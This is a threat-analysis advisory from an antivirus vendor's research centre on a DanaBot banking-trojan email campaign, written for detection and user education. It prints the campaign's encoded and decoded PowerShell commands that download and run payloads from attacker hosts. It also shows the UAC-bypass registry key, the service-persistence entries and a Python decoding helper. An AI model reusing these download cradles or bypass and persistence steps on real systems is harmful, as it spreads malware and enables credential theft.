TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email from a campaign spreading the banking trojan DanaBot, sent on November 13, 2018.
Cyber-criminals use social-engineering techniques in fraudulent mass mailings to induce the victim to open an infected attachment or to click a link in the body of the message.
Fake Mail spreads Trojan "DanaBot"
Name: DanaBot
Malware family: Banker
VirIT: Trojan.Win32.DanaBot
Description:
The email was detected on November 13, 2018
Example of examined email:
Subject: invoice n11395_18_11
[image_1: the examined email]
How it spreads:
The malware spreads via deceptive e-mails that notify the recipient of an invoice ("fattura") Nxxxxxx and carry the attachment fattura[random_number].rar.
Unpacking the RAR archive yields the file fattura[random_number].vbs which, when executed, starts the infection chain.
When fattura[random_number].vbs is run, nothing appears to happen. In fact the script keeps running and sleeps for 15 minutes (a delay likely intended to outlast automated sandbox analysis) before downloading the payload with the following PowerShell command, passed through -EncodedCommand, i.e. as base64 of the UTF-16LE script text:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand
"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu
AFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AH
IAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAGwAZQBwAGgAYQBuAHQA
YwBlAGwAbAAuAHMAdABvAHIAZQA6ADQANAAzAC8AYwBoAGsAZQBzAG8Acw
BvAGQALwBkAG8AdwBuAHMALwB0AFMAeABXACcAKQA7AA==
Its decoded value is:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
IEX (New-Object Net.WebClient).DownloadString('https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW');
It then connects to:
https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW
and downloads the DLL KpcLIimT.dll, which is saved in the user's %Temp% folder:
- File name: KpcLIimT.dll
- Size: 450,645 bytes
- MD5: 6E7460AD7C963480984C6ACDAFAAFEFD
Once KpcLIimT.dll is on disk, the following process is created, which loads the DLL through rundll32.exe and calls its exported function f1:
C:\Windows\System32\rundll32.exe "%Temp%\KpcLIimT.dll,f1"
The same rundll32 command is also written as the default value of the registry key:
[HKCU\Software\Classes\mscfile\shell\open\command]
"C:\Windows\System32\rundll32.exe "%Temp%\KpcLIimT.dll,f1"
This key is the handler for .msc files, and HKCU\Software\Classes takes precedence over the machine-wide entries when Windows builds the merged HKCR view. The auto-elevating Event Viewer (eventvwr.exe) resolves that handler, so for an administrator account under default UAC settings the DLL ends up running at high integrity without any prompt: a well-known UAC bypass, and a key that is normally absent on a clean system, which makes its mere presence a useful detection signal. With the handler in place, fattura[random_number].vbs launches a second encoded PowerShell command:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand
JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuA
CcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAMQA5ADIALgAzAC4AMwAxAC4AMg
AxADEAJwA7ACAASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGU
AYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBo
AHQAdABwADoALwAvACcAIAArACAAJABoAG8AcwB0AG4AYQBtAGUAIAArACAAJABwAGEAd
ABoACkAOwA=
with the following decoded value:
$path = '/fax.php?id=admin';
$hostname = '192.3.31.211'; IEX(New-Object Net.Webclient).downloadstring('http://' + $hostname + $path);
Note that the download URL is assembled at run time from $hostname and $path, so it never appears as a literal string in the script and a plain search for "http" in the decoded text would not reveal it.
It connects to:
http[:]//192[.]3[.]31[.]211//fax[.]php?id=admin
and downloads KpcLIimT.dll again. This stage in turn downloads C44AF232.dll into C:\PROGRA~2\C44AF257:
- File name: C44AF232.dll
- Size: 1,702,928 bytes
- MD5: 5E5059614600B07F8D4C1DFD38FE345E
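The following Python, added here as a worked example rather than part of TG Soft's analysis, decodes both -EncodedCommand blobs shown above (copied verbatim from this page) and recovers the download URL from each. It goes slightly beyond the page: because the second stage assembles its URL at run time from $hostname and $path, the helper resolves single-quoted variable assignments and literal/variable concatenations instead of grepping for a literal URL. The function names and the bracketed defang style are the example's own choices.

```python
import base64
import re

# The two -EncodedCommand arguments from the analysis above, copied from the
# page with their line breaks (whitespace is stripped before decoding).
STAGE1_BLOB = """
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu
AFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AH
IAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAGwAZQBwAGgAYQBuAHQA
YwBlAGwAbAAuAHMAdABvAHIAZQA6ADQANAAzAC8AYwBoAGsAZQBzAG8Acw
BvAGQALwBkAG8AdwBuAHMALwB0AFMAeABXACcAKQA7AA==
"""

STAGE2_BLOB = """
JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuA
CcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAMQA5ADIALgAzAC4AMwAxAC4AMg
AxADEAJwA7ACAASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGU
AYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBo
AHQAdABwADoALwAvACcAIAArACAAJABoAG8AcwB0AG4AYQBtAGUAIAArACAAJABwAGEAd
ABoACkAOwA=
"""


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand argument.

    PowerShell expects base64 of the script encoded as UTF-16LE, which is why
    every other byte is 0x00 and the base64 shows the telltale 'A' pattern."""
    b64 = re.sub(r"\s+", "", blob)
    return base64.b64decode(b64).decode("utf-16-le")


# Single-quoted assignment:  $name = 'literal'
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
# The argument of DownloadString(...) up to the closing ');'
DOWNLOAD_RE = re.compile(r"downloadstring\(\s*(.+?)\s*\)\s*;", re.IGNORECASE)
# Pieces of a concatenation: a 'literal' or a $variable
TOKEN_RE = re.compile(r"'([^']*)'|\$(\w+)")


def resolve_download_urls(script):
    """Return the URLs passed to DownloadString(...) in a decoded script.

    Handles the stage-2 trick 'http://' + $hostname + $path by substituting
    single-quoted $variable assignments. Unresolved variables are left in
    $name form so the analyst can see what could not be recovered."""
    variables = dict(ASSIGN_RE.findall(script))
    urls = []
    for call in DOWNLOAD_RE.finditer(script):
        parts = []
        for tok in TOKEN_RE.finditer(call.group(1)):
            if tok.group(1) is not None:
                parts.append(tok.group(1))
            else:
                parts.append(variables.get(tok.group(2), "$" + tok.group(2)))
        urls.append("".join(parts))
    return urls


def defang(url):
    """Defang a URL in the bracket style used in the IOC list on this page."""
    return url.replace(":", "[:]").replace(".", "[.]")


def triage(blob):
    """Decode one -EncodedCommand blob; return the script and defanged URLs."""
    script = decode_encoded_command(blob)
    return {"script": script,
            "urls": [defang(u) for u in resolve_download_urls(script)]}


if __name__ == "__main__":
    for stage, blob in (("stage 1", STAGE1_BLOB), ("stage 2", STAGE2_BLOB)):
        result = triage(blob)
        print(stage, "->", result["script"])
        print("   download URL(s):", ", ".join(result["urls"]))
```

Run it on any -EncodedCommand value lifted from a process-creation log (Sysmon event 1 or 4688 with command-line auditing); the UTF-16LE decoding step is the same for every PowerShell version, while the variable resolver only covers the simple single-quoted concatenation seen in this campaign.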
After the download, the DLL is installed as a Windows service hosted by the operating system's svchost.exe process (a service DLL referenced through the ServiceDll parameter). Hiding behind svchost.exe makes it less conspicuous and, with Start set to 2 (automatic), guarantees that the malware runs every time the PC is started. The following registry keys are written. Note that DisplayName and Description borrow the resource strings of the legitimate System Event Notification Service (Sens.dll) so the entry looks like a built-in service, while ServiceDll points outside %SystemRoot%\system32, a mismatch that is easy to hunt for:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\C44AF232]
"DisplayName"="@%SystemRoot%\\system32\\Sens.dll,-200"
"Group"="ProfSvc_Group"
"ObjectName"="LocalSystem"
"Description"="@%SystemRoot%\\system32\\Sens.dll,-201"
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"="C:\Windows\system32\svchost.exe -k LocalService"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\C44AF232\Parameters]
"ServiceDll"="C:\PROGRA~2\C44AF257\C44AF232.DLL"
Trojan.Win32.DanaBot belongs to the Banker macro-family; its distinguishing capabilities are:
- stealing logins and passwords for important sites such as home banking, e-mail, FTP, etc.;
- allowing the attacker to control the PC remotely.
IOC
MD5:
818CF570A341F7AC8723DD5E8103345D
6E7460AD7C963480984C6ACDAFAAFEFD
5E5059614600B07F8D4C1DFD38FE345E
URL:
https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW
http[:]//192[.]3[.]31[.]211//fax[.]php?id=admin
How to identify a fake email
Experience and common sense are the first defences against this kind of scam.
Read the email carefully, in all its parts. Be wary of compressed attachments (ZIP, RAR and similar) and of script files such as .vbs inside them, as in this campaign, and, if possible, DO NOT enable automatic macro execution: with automatic execution enabled, simply opening a Word or Excel file runs its macros immediately, without any prior alert.
If you have been infected by a Banker, TG Soft's C.R.A.M. advises taking appropriate security precautions even after the affected system(s) have been remediated, such as changing the passwords you use most on the Web. If the affected workstation is used for home-banking transactions, a check with your bank is also recommended.
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or phishing attempts
Material can be sent to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, safely in two ways:
- Any suspect email can be sent directly from the recipient's mailbox to lite@virit.com, choosing "Forward as Attachment" as the sending mode and putting "Possible phishing page to verify" or "Possible Malware to verify" in the subject;
- Save the e-mail to be analysed by TG Soft's C.R.A.M. as a file outside the e-mail program in use. The resulting file must then be uploaded from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis, you must indicate an e-mail address and a brief description of the reason for the submission (for example: possible/probable phishing; possible/probable malware; other).
We give you these suggestions to help avoiding credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware.
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
If you are not yet using Vir.IT eXplorer PRO, it is advisable to install Vir.IT eXplorer Lite -FREE Edition- alongside the antivirus in use to increase the security of your computers, PCs and SERVERs alike.
Vir.IT eXplorer Lite has the following special features:
- freely usable in both private and corporate environments, with Engine+Signature updates without time limitation;
- interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend using it as a supplement to the AntiVirus already in use: it does not conflict with it or slow down the system, and it significantly increases security in terms of identification and remediation of infected files;
- it identifies and, in many cases, removes most of the viruses/malware currently circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.IT eXplorer PRO;
- through the Intrusion Detection technology, also available in the Lite version of Vir.IT eXplorer, the software is able to report new-generation viruses/malware that have installed themselves automatically and to send the reported files to TG Soft's C.R.A.M.
- Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.
For Vir.IT eXplorer PRO users...
Vir.IT eXplorer PRO owners can also contact TG Soft's technical phone support free of charge. Details can be found on the CLIENTS support page.
C.R.A.M.
TG Soft's Anti-Malware Research Center